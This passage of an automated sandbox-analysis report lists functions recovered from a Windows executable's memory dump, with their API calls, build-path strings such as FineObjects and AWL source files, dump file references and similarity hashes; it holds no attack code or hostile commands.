                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(00000001), ref: 004431FA
                                                                                                • SendMessageW.USER32(00000001,00000449,00000000,?), ref: 00443232
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 0044320B
                                                                                                • @fO, xrefs: 00443215
                                                                                                • @fO, xrefs: 0044324D
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\richeditctrlawl.cpp, xrefs: 00443243
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl$d:\build\teamagent\_work\1\s\0\awl\src\richeditctrlawl.cpp
                                                                                                • API String ID: 701072176-3046294602
                                                                                                • Opcode ID: 596b5d9fb7ab082cd34dd754da351749a2262eb4516108548c04831f428e911f
                                                                                                • Instruction ID: 50b74b97e3ecb376db019b57e7e556f8960e2640aedb85deb26fca3ef78dd952
                                                                                                • Opcode Fuzzy Hash: 596b5d9fb7ab082cd34dd754da351749a2262eb4516108548c04831f428e911f
                                                                                                • Instruction Fuzzy Hash: 750175717403106BF320AF188C06B27BAA4BB80B05F11846FFA54E62C2E7F9D9148AD9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(0053011C,005300F4,74E070F0,00489F3B), ref: 0048A2D4
                                                                                                • GetCurrentThread.KERNEL32 ref: 0048A2E4
                                                                                                • DuplicateHandle.KERNEL32(00000000,00000000), ref: 0048A2EC
                                                                                                • GetLastError.KERNEL32 ref: 0048A2F6
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0048A309
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\inc\threadobject.h, xrefs: 0048A2FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalCurrentSectionValue$DuplicateEnterErrorException@8HandleLastLeaveProcessThreadThrow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\inc\threadobject.h
                                                                                                • API String ID: 4193519912-2153716875
                                                                                                • Opcode ID: 8147fe790942d7180dd6fe1a9f71499a22cd4e966527151134c26bcefce3056d
                                                                                                • Instruction ID: eb2c1c74d36de2da43bbb2897c50d57131ae41ae4ab151ef317989788efa4f1a
                                                                                                • Opcode Fuzzy Hash: 8147fe790942d7180dd6fe1a9f71499a22cd4e966527151134c26bcefce3056d
                                                                                                • Instruction Fuzzy Hash: 2EF0A0723002106BF3202F589D4AF7B3AACEB85B11F10002AFB05DA2C2D7A5482187AA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(FFFFFFFF,005300CC,00001010,0048022B), ref: 004802F4
                                                                                                • GetCurrentThread.KERNEL32 ref: 00480304
                                                                                                • DuplicateHandle.KERNEL32(00000000,00000000), ref: 0048030C
                                                                                                • GetLastError.KERNEL32 ref: 00480316
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 00480329
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\inc\threadobject.h, xrefs: 0048031F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalCurrentSectionValue$DuplicateEnterErrorException@8HandleLastLeaveProcessThreadThrow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\inc\threadobject.h
                                                                                                • API String ID: 4193519912-2153716875
                                                                                                • Opcode ID: c19ba19d16a531f9b6aea0dd5154618e64028e90bbc30f47abd6885e93e7753b
                                                                                                • Instruction ID: 30d0f511ae0c16f473895087d654b2a6cbcaf237095d3549e6a84f22a7e47efa
                                                                                                • Opcode Fuzzy Hash: c19ba19d16a531f9b6aea0dd5154618e64028e90bbc30f47abd6885e93e7753b
                                                                                                • Instruction Fuzzy Hash: 9FF037713402106BF3101F559D4AF7B76ADEB85701F114029FB05DA1C6D7B55811C7A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: lstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 1586166983-0
                                                                                                • Opcode ID: b6419aed6bd052e30206841e9937ae177a5d1db573f660a8fec66c286d2151bf
                                                                                                • Instruction ID: e5d6037a2f14ce02812b0c76788bb343d5442b99fdaa8f4ded3d5f4be9b88c2f
                                                                                                • Opcode Fuzzy Hash: b6419aed6bd052e30206841e9937ae177a5d1db573f660a8fec66c286d2151bf
                                                                                                • Instruction Fuzzy Hash: 91C1D571900119DBEB28DF64CD82BEF73B0EB48714F1002AEEA15A7280D7399E55DB59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 4189289331-0
                                                                                                • Opcode ID: a2379d9b5b6e31b43218a8d3d99a81f7ce6712a5a3cef453701f5930cfa607af
                                                                                                • Instruction ID: 7691fc09d71967d6fbe89e82debd598dc3fcca6fc2cbef40d5879728325a90aa
                                                                                                • Opcode Fuzzy Hash: a2379d9b5b6e31b43218a8d3d99a81f7ce6712a5a3cef453701f5930cfa607af
                                                                                                • Instruction Fuzzy Hash: 09510F3E900105BBDFA49B698C42FAF77A9DF4A324F14421FF815962A3DB3DD901866C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 004893C2
                                                                                                • HeapFree.KERNEL32(00000000), ref: 004893C9
                                                                                                • GetLastError.KERNEL32(?,?), ref: 004893D3
                                                                                                  • Part of subcall function 00489FF0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,00489B3C,00000001,?,00000000,?,?,00484DC2,?), ref: 0048A00B
                                                                                                  • Part of subcall function 00489FF0: HeapAlloc.KERNEL32(00000000,?,?,00484DC2,?), ref: 0048A012
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Heap$Process$AllocErrorFreeLast
                                                                                                • String ID: Ot Ut$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\alloc.cpp
                                                                                                • API String ID: 3300557996-2997601972
                                                                                                • Opcode ID: efeb9722e7249a2dd178cc7a4800c615d324b259808a6fc364bfc16353c0620a
                                                                                                • Instruction ID: 257bf5bd54dc4ff40477f7e433074401ff8bbdf6a4c8b524d4f1286b82fbb8a7
                                                                                                • Opcode Fuzzy Hash: efeb9722e7249a2dd178cc7a4800c615d324b259808a6fc364bfc16353c0620a
                                                                                                • Instruction Fuzzy Hash: 864189B190061A9FDB10DF98C885BAFBBB4EB48704F14881AE955A7381C779AE40CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0041813A
                                                                                                • PostThreadMessageW.USER32 ref: 00418163
                                                                                                  • Part of subcall function 00412440: GetLastError.KERNEL32(?,00491C3E,?,?,000000FF,74E070F0), ref: 0041244A
                                                                                                • TlsGetValue.KERNEL32 ref: 00418179
                                                                                                • InterlockedIncrement.KERNEL32(-00000008), ref: 004181CC
                                                                                                • InterlockedDecrement.KERNEL32(00000008), ref: 004181F2
                                                                                                  • Part of subcall function 0046C190: TlsGetValue.KERNEL32(74E070F0,000000FF,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1B2
                                                                                                  • Part of subcall function 0046C190: TlsSetValue.KERNEL32(0053011C,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1D0
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0041821B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Value$CriticalInterlockedSection$DecrementEnterErrorIncrementLastLeaveMessagePostThread
                                                                                                • String ID:
                                                                                                • API String ID: 2211536355-0
                                                                                                • Opcode ID: 815b36213f388591cc0f66d37e93bf6a13f9118b21e9268364d6cb62e0cedf6b
                                                                                                • Instruction ID: a8a92ba94d261cde0e2fd49a7fb82668c5f81a13a321a11829c258d40cfe686a
                                                                                                • Opcode Fuzzy Hash: 815b36213f388591cc0f66d37e93bf6a13f9118b21e9268364d6cb62e0cedf6b
                                                                                                • Instruction Fuzzy Hash: D331DC31600649EFCB21CF68CD08BEABFE4AF44704F14415EE85A97392CB75D914CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0041826A
                                                                                                • PostThreadMessageW.USER32 ref: 00418293
                                                                                                  • Part of subcall function 00412440: GetLastError.KERNEL32(?,00491C3E,?,?,000000FF,74E070F0), ref: 0041244A
                                                                                                • TlsGetValue.KERNEL32 ref: 004182A9
                                                                                                • InterlockedIncrement.KERNEL32(-00000008), ref: 004182F3
                                                                                                • InterlockedDecrement.KERNEL32(00000008), ref: 00418319
                                                                                                  • Part of subcall function 0046C190: TlsGetValue.KERNEL32(74E070F0,000000FF,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1B2
                                                                                                  • Part of subcall function 0046C190: TlsSetValue.KERNEL32(0053011C,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1D0
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00418342
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Value$CriticalInterlockedSection$DecrementEnterErrorIncrementLastLeaveMessagePostThread
                                                                                                • String ID:
                                                                                                • API String ID: 2211536355-0
                                                                                                • Opcode ID: 8f482f98b5a074599cbdc628efe5c7dfba4f39e87fcff4664b83cfd6689c146e
                                                                                                • Instruction ID: e94daf8f652a6efefa65af81c92d1424d6c8ccc9b4b5659ebd95dac1af274bc4
                                                                                                • Opcode Fuzzy Hash: 8f482f98b5a074599cbdc628efe5c7dfba4f39e87fcff4664b83cfd6689c146e
                                                                                                • Instruction Fuzzy Hash: 6231E431A00244EFD720CF69C948BEABFF4AF44B04F18815DE85997392CB75D941CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TlsGetValue.KERNEL32 ref: 0047F443
                                                                                                • TlsSetValue.KERNEL32(0053011C), ref: 0047F461
                                                                                                • TlsSetValue.KERNEL32(0053011C,?,?,?,?,?,?,?,?,?,?,?,?,004E480E,000000FF), ref: 0047F506
                                                                                                Strings
                                                                                                • @fO, xrefs: 0047F4DC
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\messagehandlers.cpp, xrefs: 0047F4D2
                                                                                                • (, xrefs: 0047F498
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Value
                                                                                                • String ID: ($@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\messagehandlers.cpp
                                                                                                • API String ID: 3702945584-1973522003
                                                                                                • Opcode ID: 9c292b15baf41fb37b08918eca14d4bfe763f09c2f46acbf10f6d99d9d906f42
                                                                                                • Instruction ID: cccdd9107c58d4cb472f176e12607151343e81e76522129a1c66980717a4854e
                                                                                                • Opcode Fuzzy Hash: 9c292b15baf41fb37b08918eca14d4bfe763f09c2f46acbf10f6d99d9d906f42
                                                                                                • Instruction Fuzzy Hash: C921AD71D00248ABDB10DF69DD41BEFBBB1FB98710F20822AF805A7391EB748950CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32 ref: 004A108F
                                                                                                • TlsGetValue.KERNEL32 ref: 004A10AC
                                                                                                • TlsSetValue.KERNEL32(0053011C), ref: 004A10CA
                                                                                                  • Part of subcall function 004B9AA0: InterlockedIncrement.KERNEL32 ref: 004B9AE0
                                                                                                  • Part of subcall function 004B9AA0: InterlockedDecrement.KERNEL32(004A13A5), ref: 004B9B69
                                                                                                  • Part of subcall function 004B9AA0: InterlockedDecrement.KERNEL32(004A13A5), ref: 004B9BB3
                                                                                                  • Part of subcall function 004B9AA0: RegCloseKey.ADVAPI32(00000000), ref: 004B9BDB
                                                                                                  • Part of subcall function 004B9AA0: SetLastError.KERNEL32(00000000), ref: 004B9BE2
                                                                                                • TlsSetValue.KERNEL32(0053011C), ref: 004A1105
                                                                                                • LeaveCriticalSection.KERNEL32(00534C78), ref: 004A111E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: InterlockedValue$CriticalDecrementSection$CloseEnterErrorIncrementLastLeave
                                                                                                • String ID: xLS
                                                                                                • API String ID: 2140798447-185458877
                                                                                                • Opcode ID: 7c5b9aebc5c9465039590f790bb4baa075df1c0862ea7a239aa13d36c607e4d7
                                                                                                • Instruction ID: bbc69c0a583e9c02c9294ba63b91d9195daf89c86979aa4d4e8716d811802c62
                                                                                                • Opcode Fuzzy Hash: 7c5b9aebc5c9465039590f790bb4baa075df1c0862ea7a239aa13d36c607e4d7
                                                                                                • Instruction Fuzzy Hash: FD21BE30905388EFDB01CFA8DC4A79E7FF4AB1A714F104199E854AB392C3B65E14CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32 ref: 00437420
                                                                                                • LeaveCriticalSection.KERNEL32(00534550), ref: 00437463
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$PES$d:\build\teamagent\_work\1\s\0\awl\src\winappawl.cpp$l P
                                                                                                • API String ID: 944179621-2109012921
                                                                                                • Opcode ID: bbfa2569f7a3057ad5fafc86e96c185ab9f2088a854e74ae657c4db0d84cb37f
                                                                                                • Instruction ID: f2cba0c90e139e20bc3c5c17cee8229fb17173f5e9e1372fd39f87b7968f28c2
                                                                                                • Opcode Fuzzy Hash: bbfa2569f7a3057ad5fafc86e96c185ab9f2088a854e74ae657c4db0d84cb37f
                                                                                                • Instruction Fuzzy Hash: 16219D71800B84DBD720CF58C90975ABFF0BB05B18F10864EE49A6B7C1D3F96648CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • @fO, xrefs: 0044E429
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\unicodecomboboxawl.cpp, xrefs: 0044E41F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\unicodecomboboxawl.cpp
                                                                                                • API String ID: 2353593579-3778035943
                                                                                                • Opcode ID: 56272a72091f55932118cd016df8a861113a14735bf6c63e25bd5bc64047455e
                                                                                                • Instruction ID: 11ae856aeb105417f2163d964d7f7041fecc7d30e96b217bf3686e26d23589f1
                                                                                                • Opcode Fuzzy Hash: 56272a72091f55932118cd016df8a861113a14735bf6c63e25bd5bc64047455e
                                                                                                • Instruction Fuzzy Hash: 39413471600245AAEF10DFA9CD85FEA77ACBB44704F04457AED04DB285EB74E9448B74
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TlsGetValue.KERNEL32(?,?,?,?,004DDC9F,000000FF), ref: 00424499
                                                                                                • InterlockedIncrement.KERNEL32(-00000007), ref: 004244E6
                                                                                                • InterlockedDecrement.KERNEL32(00000005), ref: 00424506
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Value$CriticalInterlockedSection$DecrementEnterException@8IncrementLeaveThrow
                                                                                                • String ID: @fO$Wia\Wia2DeviceManager.cpp
                                                                                                • API String ID: 1983185922-1622186474
                                                                                                • Opcode ID: d6fade8c4953602355af32a75ba38c608ede8edde49d342e2d89f3227ed4d050
                                                                                                • Instruction ID: 234d6fc8a5a3bb488b4bfd903b54eed800b6039a9dd7af19ac3aff46369ff206
                                                                                                • Opcode Fuzzy Hash: d6fade8c4953602355af32a75ba38c608ede8edde49d342e2d89f3227ed4d050
                                                                                                • Instruction Fuzzy Hash: F341ED31B01224EFDB24DF64D845BAABBA4EF45B08F54815EE84A9B391D779ED00CB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window
                                                                                                • String ID: @fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\dockingawl.cpp
                                                                                                • API String ID: 2353593579-1250480157
                                                                                                • Opcode ID: 570e15cfc1175651cf2387aae4634f37a2a94e871142378cb7919ffedc624d01
                                                                                                • Instruction ID: 054d8425a73d248933574c0465984305aaa5da139ea54d22d148b5fb273f792a
                                                                                                • Opcode Fuzzy Hash: 570e15cfc1175651cf2387aae4634f37a2a94e871142378cb7919ffedc624d01
                                                                                                • Instruction Fuzzy Hash: 0831F4353403001BE734DB2DC883B6B73D2EBC4700F58891EEA95D7796D7B9E8898699
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004742B0: GetVersionExW.KERNEL32(00534020,00000000,?,0000000A,00415A52), ref: 004742CF
                                                                                                  • Part of subcall function 004742B0: InterlockedExchange.KERNEL32(0053401C,00000001), ref: 004742FF
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0046717C
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00467220
                                                                                                  • Part of subcall function 00468820: InterlockedDecrement.KERNEL32(?), ref: 004688C6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$CursorExchangeLoadVersion
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\popuptoolbarawl.cpp$xMS
                                                                                                • API String ID: 252049199-716282881
                                                                                                • Opcode ID: 6fce0601cf24017eb4c040354e5687623ad59af756d03804f5b55a06c23127c7
                                                                                                • Instruction ID: 96f0883e7998a83d9997e10882ff8b5f659e390cda8dbd0ae5b0c0a6b91e0c4c
                                                                                                • Opcode Fuzzy Hash: 6fce0601cf24017eb4c040354e5687623ad59af756d03804f5b55a06c23127c7
                                                                                                • Instruction Fuzzy Hash: 7A310571644604ABEB209B15DD12FAB7764EB51718F10822FF8156B3C1EBBC5E0487AA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0042AA40: InterlockedDecrement.KERNEL32(?), ref: 0042AB14
                                                                                                  • Part of subcall function 0042AA40: InterlockedDecrement.KERNEL32(?), ref: 0042AB30
